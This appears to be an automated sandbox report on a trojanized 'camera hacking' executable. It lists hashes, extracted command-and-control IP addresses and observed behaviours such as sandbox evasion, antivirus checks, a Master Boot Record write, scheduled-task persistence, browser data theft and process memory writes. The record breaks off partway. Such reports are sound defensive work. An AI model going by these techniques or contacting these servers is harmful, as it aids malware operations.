Analysis
-
max time kernel
112s -
max time network
113s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
29-03-2023 19:27
Static task
static1
Behavioral task
behavioral1
Sample
vzlom-kamer-by-neit_wcEYk7hQ.exe
Resource
win7-20230220-en
General
-
Target
vzlom-kamer-by-neit_wcEYk7hQ.exe
-
Size
4.5MB
-
MD5
fe0f3853a9f25f71af7a13b313d8521b
-
SHA1
d868f1263393e0440605abe012e6a7626b12bca9
-
SHA256
b89f3ebe1ac94726b821a3c23464236586364d2756881a32bef853e7183739ab
-
SHA512
ea878fd94bee5aa1bc77e64fa6350e6ddcb2d88c32e341ab320701af1feefd424167a46f863c5d1c5226448fe8539f4c8f76e76b6ec49ee2674438ac0bea7a76
-
SSDEEP
98304:nP4tWsF8pOX+Q9WZps5699OChBZ/MrbmY2NTeM6T/Mn:P4tWsFNX+9I61hBZ8bm9TW/Mn
Malware Config
Extracted
gcleaner
85.31.45.39
85.31.45.250
85.31.45.251
85.31.45.88
Signatures
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
71r9O7Y9zIfGXmeBiL.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 71r9O7Y9zIfGXmeBiL.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
71r9O7Y9zIfGXmeBiL.exeFileDate329.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation 71r9O7Y9zIfGXmeBiL.exe Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation FileDate329.exe -
Executes dropped EXE 12 IoCs
Processes:
is-75BBU.tmpIC329.exeIC329.exevzlom_kamer_by_neit.rar_id25861706.exeDMfcPC.exe71r9O7Y9zIfGXmeBiL.exeis-LA33S.tmpFileDate329.exe9nx2u.exeis-GRU8E.tmpSyncBackupShell.exekSdbFaL.exepid process 4500 is-75BBU.tmp 4668 IC329.exe 2144 IC329.exe 3372 vzlom_kamer_by_neit.rar_id25861706.exe 2772 DMfcPC.exe 3124 71r9O7Y9zIfGXmeBiL.exe 4036 is-LA33S.tmp 3448 FileDate329.exe 2396 9nx2u.exe 2236 is-GRU8E.tmp 4952 SyncBackupShell.exe 820 kSdbFaL.exe -
Loads dropped DLL 7 IoCs
Processes:
is-75BBU.tmpis-LA33S.tmpis-GRU8E.tmppid process 4500 is-75BBU.tmp 4036 is-LA33S.tmp 4036 is-LA33S.tmp 4036 is-LA33S.tmp 2236 is-GRU8E.tmp 2236 is-GRU8E.tmp 2236 is-GRU8E.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks for any installed AV software in registry 1 TTPs 4 IoCs
Processes:
IC329.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop\Build IC329.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop\Build IC329.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Avira\AntiVir Desktop IC329.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Avira\AntiVir Desktop IC329.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
vzlom_kamer_by_neit.rar_id25861706.exedescription ioc process File opened for modification \??\PhysicalDrive0 vzlom_kamer_by_neit.rar_id25861706.exe -
Drops file in System32 directory 6 IoCs
Processes:
71r9O7Y9zIfGXmeBiL.exepowershell.exepowershell.exekSdbFaL.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini 71r9O7Y9zIfGXmeBiL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol kSdbFaL.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini kSdbFaL.exe -
Drops file in Program Files directory 56 IoCs
Processes:
is-75BBU.tmpis-GRU8E.tmpSyncBackupShell.exedescription ioc process File created C:\Program Files (x86)\ImageComparer\is-59ERO.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-JVMH1.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\is-NFTTB.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\is-02UP6.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-3HKL3.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\is-B2520.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\is-3E878.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-FM8N5.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-NDHHD.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\Languages\is-KD929.tmp is-GRU8E.tmp File opened for modification C:\Program Files (x86)\ImageComparer\unins000.dat is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-OMFNE.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-1E15F.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-E5S6K.tmp is-75BBU.tmp File opened for modification C:\Program Files (x86)\ImageComparer\ImageComparer.url is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\unins000.dat is-GRU8E.tmp File opened for modification C:\Program Files (x86)\BKngBackup\SyncBackupShell.exe is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-KNL17.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\Help\images\is-2CBSA.tmp is-GRU8E.tmp File created C:\Program Files (x86)\BKngBackup\is-4U2SJ.tmp is-GRU8E.tmp File created C:\Program Files (x86)\BKngBackup\Help\images\is-CVLEC.tmp is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-PQ96C.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-VIDUL.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\is-3AFQR.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\Help\images\is-VOAF7.tmp is-GRU8E.tmp File opened for modification C:\Program Files (x86)\BKngBackup\unins000.dat is-GRU8E.tmp File created C:\Program Files (x86)\clFlow SyncBackupShell.exe File created C:\Program Files (x86)\ImageComparer\is-4IIBK.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\is-UJJEO.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-EE50I.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-RCGCO.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\is-I5LUF.tmp is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-O00K5.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\is-BTL1T.tmp is-GRU8E.tmp File created C:\Program Files (x86)\BKngBackup\is-92OVL.tmp is-GRU8E.tmp File created C:\Program Files (x86)\BKngBackup\is-IGMAP.tmp is-GRU8E.tmp File created C:\Program Files (x86)\BKngBackup\Help\is-917MI.tmp is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\is-B627N.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-AAOHE.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-E1AL8.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-S6N81.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-2GHK1.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-BL8UK.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-BUJ01.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-SQQJH.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\is-2IVB9.tmp is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\unins000.dat is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-I3SP5.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\is-6PB6V.tmp is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\is-MHHNR.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-THHLJ.tmp is-75BBU.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-6O37R.tmp is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\Help\is-9AAOS.tmp is-GRU8E.tmp File created C:\Program Files (x86)\ImageComparer\languages\is-T5AHA.tmp is-75BBU.tmp File opened for modification C:\Program Files (x86)\ImageComparer\IC329.exe is-75BBU.tmp File created C:\Program Files (x86)\BKngBackup\Help\images\is-FNRT1.tmp is-GRU8E.tmp -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bIIVPNBwJtQvPFWhKj.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 45 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4880 4668 WerFault.exe IC329.exe 4592 4668 WerFault.exe IC329.exe 3360 4668 WerFault.exe IC329.exe 1888 4668 WerFault.exe IC329.exe 3124 2144 WerFault.exe IC329.exe 4544 2144 WerFault.exe IC329.exe 1428 2144 WerFault.exe IC329.exe 4608 2144 WerFault.exe IC329.exe 3188 2144 WerFault.exe IC329.exe 2124 2144 WerFault.exe IC329.exe 1768 2144 WerFault.exe IC329.exe 3988 2144 WerFault.exe IC329.exe 1840 2144 WerFault.exe IC329.exe 1980 2144 WerFault.exe IC329.exe 4480 2144 WerFault.exe IC329.exe 4296 2144 WerFault.exe IC329.exe 2820 2144 WerFault.exe IC329.exe 2808 2144 WerFault.exe IC329.exe 2932 2144 WerFault.exe IC329.exe 2148 2144 WerFault.exe IC329.exe 4152 2144 WerFault.exe IC329.exe 552 2144 WerFault.exe IC329.exe 4608 2144 WerFault.exe IC329.exe 4712 2144 WerFault.exe IC329.exe 2608 2144 WerFault.exe IC329.exe 2128 2144 WerFault.exe IC329.exe 4532 2144 WerFault.exe IC329.exe 2236 2144 WerFault.exe IC329.exe 3344 2144 WerFault.exe IC329.exe 3216 2144 WerFault.exe IC329.exe 1980 2144 WerFault.exe IC329.exe 652 2144 WerFault.exe IC329.exe 4104 2144 WerFault.exe IC329.exe 3520 2144 WerFault.exe IC329.exe 516 2144 WerFault.exe IC329.exe 2864 2144 WerFault.exe IC329.exe 2952 2144 WerFault.exe IC329.exe 2132 2144 WerFault.exe IC329.exe 4296 2144 WerFault.exe IC329.exe 4856 2144 WerFault.exe IC329.exe 4708 2144 WerFault.exe IC329.exe 3188 2144 WerFault.exe IC329.exe 792 2144 WerFault.exe IC329.exe 4256 2144 WerFault.exe IC329.exe 2896 2144 WerFault.exe IC329.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 1124 schtasks.exe 1552 schtasks.exe 3244 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
71r9O7Y9zIfGXmeBiL.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS 71r9O7Y9zIfGXmeBiL.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName 71r9O7Y9zIfGXmeBiL.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3728 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Modifies registry class 1 IoCs
Processes:
IC329.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings IC329.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
taskmgr.exeIC329.exevzlom_kamer_by_neit.rar_id25861706.exepowershell.EXEpid process 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 2144 IC329.exe 2144 IC329.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 2144 IC329.exe 2144 IC329.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3372 vzlom_kamer_by_neit.rar_id25861706.exe 3372 vzlom_kamer_by_neit.rar_id25861706.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3732 powershell.EXE 3524 taskmgr.exe 3732 powershell.EXE 3732 powershell.EXE 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
taskmgr.exetaskkill.exepowershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 3524 taskmgr.exe Token: SeSystemProfilePrivilege 3524 taskmgr.exe Token: SeCreateGlobalPrivilege 3524 taskmgr.exe Token: SeDebugPrivilege 3728 taskkill.exe Token: SeDebugPrivilege 3732 powershell.EXE Token: SeDebugPrivilege 1340 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 720 powershell.EXE Token: 33 3524 taskmgr.exe Token: SeIncBasePriorityPrivilege 3524 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exevzlom_kamer_by_neit.rar_id25861706.exepid process 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3372 vzlom_kamer_by_neit.rar_id25861706.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe 3524 taskmgr.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
vzlom_kamer_by_neit.rar_id25861706.exepid process 3372 vzlom_kamer_by_neit.rar_id25861706.exe 3372 vzlom_kamer_by_neit.rar_id25861706.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
vzlom-kamer-by-neit_wcEYk7hQ.exeis-75BBU.tmpnet.exenet.exeIC329.exeDMfcPC.exeis-LA33S.tmpnet.exe9nx2u.exe71r9O7Y9zIfGXmeBiL.exeis-GRU8E.tmpWerFault.exeWerFault.exeWerFault.execmd.exedescription pid process target process PID 2724 wrote to memory of 4500 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe is-75BBU.tmp PID 2724 wrote to memory of 4500 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe is-75BBU.tmp PID 2724 wrote to memory of 4500 2724 vzlom-kamer-by-neit_wcEYk7hQ.exe is-75BBU.tmp PID 4500 wrote to memory of 1096 4500 is-75BBU.tmp net.exe PID 4500 wrote to memory of 1096 4500 is-75BBU.tmp net.exe PID 4500 wrote to memory of 1096 4500 is-75BBU.tmp net.exe PID 4500 wrote to memory of 4668 4500 is-75BBU.tmp IC329.exe PID 4500 wrote to memory of 4668 4500 is-75BBU.tmp IC329.exe PID 4500 wrote to memory of 4668 4500 is-75BBU.tmp IC329.exe PID 1096 wrote to memory of 3756 1096 net.exe net1.exe PID 1096 wrote to memory of 3756 1096 net.exe net1.exe PID 1096 wrote to memory of 3756 1096 net.exe net1.exe PID 4500 wrote to memory of 1264 4500 is-75BBU.tmp net.exe PID 4500 wrote to memory of 1264 4500 is-75BBU.tmp net.exe PID 4500 wrote to memory of 1264 4500 is-75BBU.tmp net.exe PID 4500 wrote to memory of 2144 4500 is-75BBU.tmp IC329.exe PID 4500 wrote to memory of 2144 4500 is-75BBU.tmp IC329.exe PID 4500 wrote to memory of 2144 4500 is-75BBU.tmp IC329.exe PID 1264 wrote to memory of 1684 1264 net.exe net1.exe PID 1264 wrote to memory of 1684 1264 net.exe net1.exe PID 1264 wrote to memory of 1684 1264 net.exe net1.exe PID 2144 wrote to memory of 2772 2144 IC329.exe DMfcPC.exe PID 2144 wrote to memory of 2772 2144 IC329.exe DMfcPC.exe PID 2144 wrote to memory of 2772 2144 IC329.exe DMfcPC.exe PID 2144 wrote to memory of 3124 2144 IC329.exe 71r9O7Y9zIfGXmeBiL.exe PID 2144 wrote to memory of 3124 2144 IC329.exe 71r9O7Y9zIfGXmeBiL.exe PID 2144 wrote to memory of 3124 2144 IC329.exe 71r9O7Y9zIfGXmeBiL.exe PID 2772 wrote to memory of 4036 2772 DMfcPC.exe is-LA33S.tmp PID 2772 wrote to memory of 4036 2772 DMfcPC.exe is-LA33S.tmp PID 2772 wrote to memory of 4036 2772 DMfcPC.exe is-LA33S.tmp PID 4036 wrote to memory of 2444 4036 is-LA33S.tmp net.exe PID 4036 wrote to memory of 2444 4036 is-LA33S.tmp net.exe PID 4036 wrote to memory of 2444 4036 is-LA33S.tmp net.exe PID 4036 wrote to memory of 3448 4036 is-LA33S.tmp FileDate329.exe PID 4036 